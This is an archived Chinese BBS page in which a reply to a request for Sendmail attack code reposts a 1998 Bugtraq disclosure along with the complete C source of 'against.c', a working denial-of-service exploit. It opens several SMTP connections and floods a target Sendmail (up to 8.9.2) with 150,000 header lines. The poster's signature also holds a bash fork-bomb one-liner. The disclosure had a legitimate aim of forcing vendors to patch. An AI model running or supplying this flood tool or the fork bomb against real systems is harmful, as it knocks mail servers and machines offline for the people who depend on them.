📄 385.htm
字号:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>CTerm非常精华下载</title>
</head>
<body bgcolor="#FFFFFF">
<table border="0" width="100%" cellspacing="0" cellpadding="0" height="577">
<tr><td width="32%" rowspan="3" height="123"><img src="DDl_back.jpg" width="300" height="129" alt="DDl_back.jpg"></td><td width="30%" background="DDl_back2.jpg" height="35"><p align="center"><a href="http://apue.dhs.org"><font face="黑体"><big><big>apue</big></big></font></a></td></tr>
<tr>
<td width="68%" background="DDl_back2.jpg" height="44"><big><big><font face="黑体"><p align="center"> ● UNIX网络编程 (BM: clown) </font></big></big></td></tr>
<tr>
<td width="68%" height="44" bgcolor="#000000"><font face="黑体"><big><big><p align="center"></big></big><a href="http://cterm.163.net"><img src="banner.gif" width="400" height="60" alt="banner.gif"border="0"></a></font></td>
</tr>
<tr><td width="100%" colspan="2" height="100" align="center" valign="top"><br><p align="center">[<a href="index.htm">回到开始</a>][<a href="377.htm">上一层</a>][<a href="386.htm">下一篇</a>]
<hr><p align="left"><small>发信人: VRGL (毕业设计做三维渲染----真苦!!!), 信区: Security <br>
标 题: Re: 请问哪儿可以下栽对sendmail进行攻击的源程序 <br>
发信站: BBS 水木清华站 (Sat Aug 5 09:00:49 2000) <br>
<br>
Date: Sat, 12 Dec 1998 19:39:56 +0100 <br>
From: Michal Zalewski <lcamtuf@IDS.PL> <br>
To: BUGTRAQ@netspace.org <br>
Subject: ** Sendmail 8.9.2 DoS - exploit ** get what you want! <br>
Parts/Attachments: <br>
1 Shown 32 lines Text <br>
2 OK ~2 KB Text, "" <br>
---------------------------------------- <br>
Hello again. Yesterday, I published some rather laconic information about <br>
two bugs in Sendmail up to 8.9.2, and decided to post only short <br>
description of problem + suggested patch (instead of exploit), to give <br>
developers a chance. Unfortunately, I put together information about two <br>
completely different problems in single posting, and it confuded a lot of <br>
people. So, to kill any senseless discussions - again: <br>
- The first one was 'redirection attack'; I said you could call it 'bug' <br>
instead of 'feature', but as noone likes anonymous mailbombing, <br>
network overloading / scanning, it's good to apply sendmail.cf patch <br>
included in original posting; without it, your relay could be abused in <br>
many painful ways. And yes, attack has been confirmed with 8.9.2 and <br>
sendmail.cf from 8.9.2 with relaying enabled. I don't think there's <br>
anything left to talk about. Dot. <br>
- The second one was DoS attack during headers parsing - and this is <br>
a bug, *confirmed on 8.9.2*. I included simple patch to source tree. <br>
Unfortunately, all feedback we received from developers was one-line <br>
response 'It has been fixed in 8.9.2'. Bullshit (sorry). I decided <br>
not to publish an exploit, but now I realized there's no chance for <br>
response from vendors if there's no real danger. So here it is. <br>
Attached file, against.c, should perform very 'light' attack, only <br>
for testing purposes. If you noticed increased LA during attack, <br>
your machine is vunerable. You had enough time to patch your system <br>
- don't blame me, but vendors. EOF. <br>
_______________________________________________________________________ <br>
Michal Zalewski [lcamtuf@ids.pl] [ENSI / marchew] [dione.ids.pl SYSADM] <br>
[http://linux.lepszy.od.kobiety.pl/~lcamtuf/] <=--=> bash$ :(){ :|:&};: <br>
[voice phone: +48 (0) 22 813 25 86] ? [pager (MetroBip): 0 642 222 813] <br>
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch] <br>
------------------------------snip here---------------------------------- <br>
/* <br>
against.c - Another Sendmail (and pine ;-) DoS (up to 8.9.2) <br>
(c) 1999 by <marchew@linux.lepszy.od.kobiety.pl> <br>
Usage: ./against existing_user_on_victim_host victim_host <br>
Example: ./against nobody lamers.net <br>
*/ <br>
#include <stdio.h> <br>
#include <unistd.h> <br>
#include <sys/param.h> <br>
#include <sys/socket.h> <br>
#include <sys/time.h> <br>
#include <netinet/in.h> <br>
#include <netdb.h> <br>
#include <stdarg.h> <br>
#include <errno.h> <br>
#include <signal.h> <br>
#include <getopt.h> <br>
#include <stdlib.h> <br>
#include <string.h> <br>
#define MAXCONN 5 <br>
#define LINES 150000 <br>
struct hostent *hp; <br>
struct sockaddr_in s; <br>
int suck,loop,x; <br>
int main(int argc,char* argv[]) { <br>
<br>
<br>
printf("against.c - another Sendmail DoS (up to 8.9.2)\n"); <br>
if (argc-3) { <br>
printf("Usage: %s victim_user victim_host\n",argv[0]); <br>
exit(0); <br>
} <br>
<br>
hp=gethostbyname(argv[2]); <br>
<br>
if (!hp) { <br>
perror("gethostbyname"); <br>
exit(1); <br>
} <br>
fprintf(stderr,"Doing mess: "); <br>
for (;loop<MAXCONN;loop++) if (!(x=fork())) { <br>
FILE* d; <br>
bcopy(hp->h_addr,(void*)&s.sin_addr,hp->h_length); <br>
s.sin_family=hp->h_addrtype; <br>
s.sin_port=htons(25); <br>
if ((suck=socket(AF_INET,SOCK_STREAM,0))<0) perror("socket"); <br>
if (connect(suck,(struct sockaddr *)&s,sizeof(s))) perror("connect"); <br>
if (!(d=fdopen(suck,"w"))) { perror("fdopen"); exit(0); } <br>
usleep(100000); <br>
fprintf(d,"helo tweety\n"); <br>
fprintf(d,"mail from: tweety@polbox.com\n"); <br>
fprintf(d,"rcpt to: %s@%s\n",argv[1],argv[2]); <br>
fprintf(d,"data\n"); <br>
usleep(100000); <br>
for(loop=0;loop<LINES;loop++) { <br>
if (!(loop%100)) fprintf(stderr,"."); <br>
fprintf(d,"To: x\n"); <br>
} <br>
fprintf(d,"\n\n\nsomedata\n\n\n"); <br>
fprintf(d,".\n"); <br>
sleep(1); <br>
fprintf(d,"quit\n"); <br>
fflush(d); <br>
sleep(100); <br>
shutdown(suck,2); <br>
close(suck); <br>
exit(0); <br>
} <br>
waitpid(x,&loop,0); <br>
fprintf(stderr,"ok\n"); <br>
return 0; <br>
} <br>
<br>
【 在 volkswagon (痛哭的人) 的大作中提到: 】 <br>
: 如题 <br>
<br>
<br>
-- <br>
</small><hr>
<p align="center">[<a href="index.htm">回到开始</a>][<a href="377.htm">上一层</a>][<a href="386.htm">下一篇</a>]
<p align="center"><a href="http://cterm.163.net">欢迎访问Cterm主页</a></p>
</table>
</body>
</html>⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -